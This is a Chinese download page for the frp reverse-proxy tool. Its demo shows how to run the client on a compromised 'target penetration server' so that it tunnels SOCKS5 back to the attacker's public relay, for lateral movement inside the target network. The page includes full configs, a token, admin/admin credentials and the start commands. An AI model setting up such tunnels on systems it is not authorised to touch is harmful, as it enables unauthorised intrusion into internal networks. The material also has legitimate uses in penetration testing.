简介
frp 是一款高性能的反向代理应用,专注于内网穿透。它支持多种协议,包括 TCP、UDP、HTTP、HTTPS 等,并且具备 P2P 通信功能。使用 frp,您可以安全、便捷地将内网服务暴露到公网,通过拥有公网 IP 的节点进行中转。
使用场景
- 渗透内网机器:当通过打点进入到目标内网后,在内网机器启动frp客户端连接公网frp服务端,即可通过您的公网机器对目标内网环境进行扫描。
- 内网穿透:在企业网络环境中,您可能有一些内部服务需要对外提供访问,比如内部网站、应用程序等。使用 FRP 可以轻松地实现内网穿透,让外部用户通过公网访问内部服务,而无需直接暴露内网的 IP 地址。
- 轻量级代理服务:FRP 还可以用作轻量级的代理服务,通过端口转发功能,将公网上的请求转发到内部服务器上,以实现负载均衡、流量控制等功能。
演示案例
从目标内网服务器建立一条Socks5隧道到中转公网服务器上,最后客户端连接到中转公网服务器的Socks端口。
Tips:只需要记得frpc(客户端)放到目标渗透服务器上,frps(服务端)放到自己的公网服务器上即可。
此方案需要目标渗透服务器可出网!
服务端配置文件:frps.toml
[common]
# FRP 服务端监听端口
bind_port = 65535
# 开启 token 增加安全性
token = b91fa07e-2036-4a0b-9a1c-b6f04055279c客户端配置文件:frpc.toml
[common]
# 要连接公网服务器的IP
server_addr = <YOUR IP Address>
# 对应frps的bind_port,也就是frps的监听端口
server_port = 65535
# 与frps的token一致
token = b91fa07e-2036-4a0b-9a1c-b6f04055279c
[socks5_proxy]
type = tcp
# 启用SOCKS5插件
plugin = socks5
# 主控公网服务端暴露的SOCKS端口
remote_port = 65534
# SOCKS用户名
plugin_user = admin
# SOCKS密码
plugin_passwd = admin 先在自己的公网中转服务器上放入 frps 和 frps.toml,然后启动frp的服务端。
frps -c frps.toml在目标渗透服务器上放入 frpc 和 frpc.toml,然后启动frp的客户端来连接frp的服务端。
frpc -c frpc.toml当frp的客户端和服务端都启动后,说明socks5隧道已建立好,接下来用自己客户端连接自己公网中转服务器的socks5端口即可,根据示例配置,socks5连接信息如下。
IP: <YOUR Server IP Address>
Port: 65534
username:admin
password:admin连接好socks5隧道后,就相当于客户端 = 目标内网服务器的网络环境,就可以进行内网渗透了。
使用说明
- 官方文档:frp (gofrp.org)
下载
极核始终提供一条免费的直链下载通道!
为防止恶意爬取下载,请登录并回复后下载!
为防止恶意爬取下载,请登录并回复后下载!
✈️ 全球下载通道
🚀 极核加速通道
THE END
- 最新
- 最热
只看作者